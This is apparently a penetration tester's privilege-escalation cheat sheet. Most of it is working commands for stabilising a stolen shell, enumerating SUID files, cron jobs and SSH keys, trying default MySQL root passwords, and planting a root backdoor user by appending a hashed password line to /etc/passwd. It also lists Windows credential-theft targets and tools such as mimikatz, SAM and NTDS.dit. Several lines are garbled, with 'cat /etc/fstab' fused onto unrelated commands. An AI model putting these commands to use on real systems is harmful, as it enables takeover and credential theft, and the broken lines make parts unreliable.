python -c 'import pty; pty.spawn("/bin/bash")'
-
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
Ctrl + Z [Background Process]
stty raw -echo ; fg ; reset
stty columns 200 rows 200python3 -m http.server 31337

sudo -l
ls -salth /etc/sudoers

find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null

# Enumerate places you most likely have rwx.
/tmp/
/var/tmp/
/dev/shm/command

# World-Writable Files and Directories
find / -type f -perm -o=w 2>/dev/null
find / -type d -perm -o=w 2>/dev/null

# Look for unpatched kernel exploits
uname -a
cat /etc/*-release
cat /etc/issue
file /bin/bash

# Check for services running as root.
ps aux |grep -i 'root' --color=auto

netstat -antup
netstat -tunlp

ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/
ls -lsaht /var/lib/
ls -lsaht /var/db/

ls -lsaR /home/                            # .ssh keys
ls -lsaht |grep -i ‘.conf’ --color=auto    # .conf files

crontab –u root –l

cat /etc/crontab
ls /etc/cron.*

ls -lsaht |grep -i ‘.secret’ --color=auto

cd /var/www/html/
ls -lsaht

cd /home/
ls -lsaht

ls /etc/passwd

mysql -uroot -p
Enter Password:
root : root
root : toor
root :

openssl passwd -1
hack4fun
$1$hXUuF5iI$hTj2iYkVREvSGZbUfA9yG1
echo 'tox:$1$hXUuF5iI$hTj2iYkVREvSGZbUfA9yG1:0:0:tox:/home/tox:/bin/bash' >> /etc/passwd
su tox
id

# Find exotic file mounts
cat /etc/fstab

# Find out if the system is 32 or 64 bit.
cd /var/tmp/
File Transfer --> pspy32
File Transfer --> pspy64
chmod 755 pspy32 pspy64
./pspy<32/64>

# If there are spaces in the path, you could potentially place malicious executables in the path to gain elevated permissions.
|
wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:\Windows\\" 2>nul |findstr /i /v """cat /etc/fstab

# Some tasks or services might be misconfigured to run files that low-privileged users can modify.
# You can use tools like schtasks or net start to list tasks and services, then check permissions on the associated files or folders.

# Misconfigured permissions on files or folders can allow an attacker to modify, replace, or execute files with elevated permissions.
# Tools like accesschk (from Sysinternals) can help identify overly permissive settings.
|
accesschk.exe -uws "Everyone" C:\cat /etc/fstab

# Windows systems sometimes have credentials stored in various locations, like the registry, Group Policy Preferences, or in configuration files.
# Tools like mimikatz can be used to extract plaintext passwords and hashes from memory.

# Windows Credential Manager:
# Stores user credentials for various services and applications. It can be accessed via Control Panel or the cmdkey command.

# SAM (Security Accounts Manager) File:
# Located at C:\Windows\System32\config\SAM, this file stores local user account passwords in a hashed format.
# This file isn’t directly accessible while the OS is running. Tools like Mimikatz or pwdump can be used to extract hashes.

# NTDS.dit:
# This file is relevant for domain controllers. It contains Active Directory data, including user credentials.
# Located at C:\Windows\NTDS\NTDS.dit. 

# User Directories:
# Searching through a user’s documents, desktop, and downloads might reveal saved passwords or authentication tokens.
# Common paths include C:\Users\[USERNAME]\Documents, C:\Users\[USERNAME]\Desktop, and C:\Users\[USERNAME]\Downloads. 

# Pagefile.sys and Hiberfil.sys:
# These system files might contain plaintext passwords or other sensitive data left behind in memory. Directly analyzing them can sometimes yield useful information.